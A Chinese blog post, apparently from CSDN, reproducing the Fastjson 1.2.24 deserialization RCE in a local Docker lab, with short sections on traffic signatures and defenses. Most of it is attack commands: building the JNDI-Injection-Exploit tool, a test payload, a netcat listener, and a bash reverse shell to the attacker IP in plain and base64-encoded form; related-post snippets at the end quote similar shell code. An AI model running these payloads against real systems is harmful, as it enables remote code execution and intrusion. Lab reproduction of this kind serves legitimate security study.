Fastjson 漏洞复现1.2.24-rce

已于 2024-08-26 09:28:29 修改
阅读量1.5k 收藏 38
点赞数 37
分类专栏: 漏洞复现 文章标签: 安全
于 2024-08-22 15:32:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50853870/article/details/141413985
版权

1.原理

fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞

2.实验准备

攻击机kali ip:192.168.3.183

靶机ubuntu ip:192.168.3.163

1.Bp抓包会用到的插件

​​​​​​Releases · Maskhe/FastjsonScan (github.com)

2.fastjson工具

我是直接下载到靶机里,这个工具跟log4j2用的工具是一样的,如果你看过我的log4j2文章,你可以直接把这个工具复制到fastjson文件里应用

git clone https://github.com/welk1n/JNDI-Injection-Exploit.git

cd JNDI-Injection-Exploit

apt install maven

mvn clean package -DskipTests

最后下载完长这样,这个JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar就是我们要用到

3.漏洞复现

1.启动靶场,查看开放端口

docker-compose up -d

docker ps

访问http://your-ip:8090

2.漏洞检测

bp抓包,右键找到框中的位置点击转成post类型

3.漏洞验证

执行如下命令,如果最后执行成功,会在 /tmp 目录下创建一个名为 xiaocai 的空文件

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/xiaocai" -A "192.168.3.163"

你去文件夹里找会发现/tmp 目录下没有名为 xiaocai 的空文件,那是因为你打开的方式不对,我们可以执行

docker exec -it bbba060c8561 /bin/bash

即 docker exec -it 容器ID /bin/bash

4.漏洞利用

攻击机打开监听端口

nv -lvvp 9999

构建反弹shell

Runtime.exec Payload Generater | AresX's Blog (ares-x.com)

bash -i >& /dev/tcp/192.168.3.183/9999 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgzLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}

开启服务器,将之前构造的反弹Shell在 -C 后面的参数进行替换即可

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgzLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"

4.维持权限,创建后门等

5.流量特征

有@type字样

6.防御方式

升级版本,禁用autotype功能,输入验证等

7.fastjson反序列化漏洞无回显


1.一种是直接将命令执行结果写到静态资源文件里面,如html,js等,然后可以通过http访问看到结果
2.通过dnslog外带
3.直接将命令结果回显到请求POC的http响应中

人们并不感谢罗辑
关注
专栏目录
FastJson1.2.24/47 Rce
weixin_44687621的博客
04-22 520
之前只在本地测试过FastJson漏洞,实战情况下一般需要利用VPS反弹shell,这里尝试一下 环境 https://buuoj.cn/challenges#[FastJson]1.2.24-rce 构建rmi服务器工具marshalsec https://github.com/RandomRobbieBF/marshalsec-jar.git FastJson1.2.24 首先编写恶意类 import java.lang.Runtime; public class Exploit{ publ
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4554
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
fastJson1.2.24漏洞复现
@起风了的博客
05-06 748
背景 fastJson1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。 而作怪的就是这个AutoType 恶意类 public class Attack { public Attack() { try { //打开本地计算器 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(com
fastjson 1.2.24 反序列化 RCE 漏洞复现
m0_63299551的博客
06-27 414
具体可以参考这篇文章FastJson的介绍与使用(一)_maven fastjson-CSDN博客fastjson最主要的功能就是可以将Java对象和json之间来回转化,而这个漏洞出现的原因就是在反序列化的过程中。
fastjson 1.2.24漏洞复现
qq_18831583的博客
01-13 877
fastjson 1.2.24漏洞复现
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
oiadkt的博客
04-12 1162
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
Fastjson1.2.24RCE漏洞复现
L1928的博客
05-18 917
1.启动环境并且访问 2.下载marshalsec-0.0.3-SNAPSHOT-all.jar 3.新建Shell.java文件 import java.lang.Runtime; import java.lang.Process; public class shell{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.
Fastjson 反序列化漏洞[1.2.24-rce]
流水不争先,争的是滔滔不绝
05-28 688
漏洞影响版本【1.2.24之前】
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 413
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
fastjson1.2.24反序列化RCE
06-24
然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24反序列化RCE漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
fastjson-1.2.24
04-24
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6393
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3423
Fastjson 1.2.47反序列化漏洞复现
Fastjson 1.2.24漏洞搭建及复现——详解
网安小白的博客
08-02 1364
反序列化Fastjson1.2.24漏洞复现全过程,图文详解,包含复现过程中出现各种问题~
fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
芜湖~米汤来喽~
10-04 1451
【代码】fastjson-1.2.24漏洞,搭建及复现,手把手图文教程。
fastjson-1.2.24漏洞复现
最新发布
qq_43599126的博客
07-04 1198
看完利用链分析后,我们来总结一下,整体来说就是fastjson是根据@type来进行反序列化类并且没有做任何限制,允许指定@type来反序列化任意类,所以导致了反序列化漏洞
Fastjson1.2.24-RCE (CVE-2017-18349)
aetlypdlg_ys的博客
05-12 961
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。
[复现]fastjson 1.2.24
kuuhh的博客
09-07 936
前言 学习了JNDI、RMI、LDAP基础后,开始复现Fastjson漏洞。 三种利用链 JdbcRowSetImpl TemplatesImpl BasicDataSource 搭建靶场 本机环境 win10 Java 1.8.0_101 Maven 3.8.1 IDEA启动一个springmvc项目,maven导入fastjson1.2.24版本的包。 <dependency> <groupId>com.alibaba</groupId> <artif
fastjson1.2.24rce漏洞复现
06-06
fastjson1.2.24rce漏洞是一种Java反序列化漏洞,攻击者可以通过构造恶意的JSON数据包,触发目标服务器上的fastjson库反序列化漏洞,从而实现远程代码执行。该漏洞存在于fastjson 1.2.24及之前版本中,已经被修复。如果您使用的是fastjson 1.2.24及之前版本,请及时升级到最新版本以避免被攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值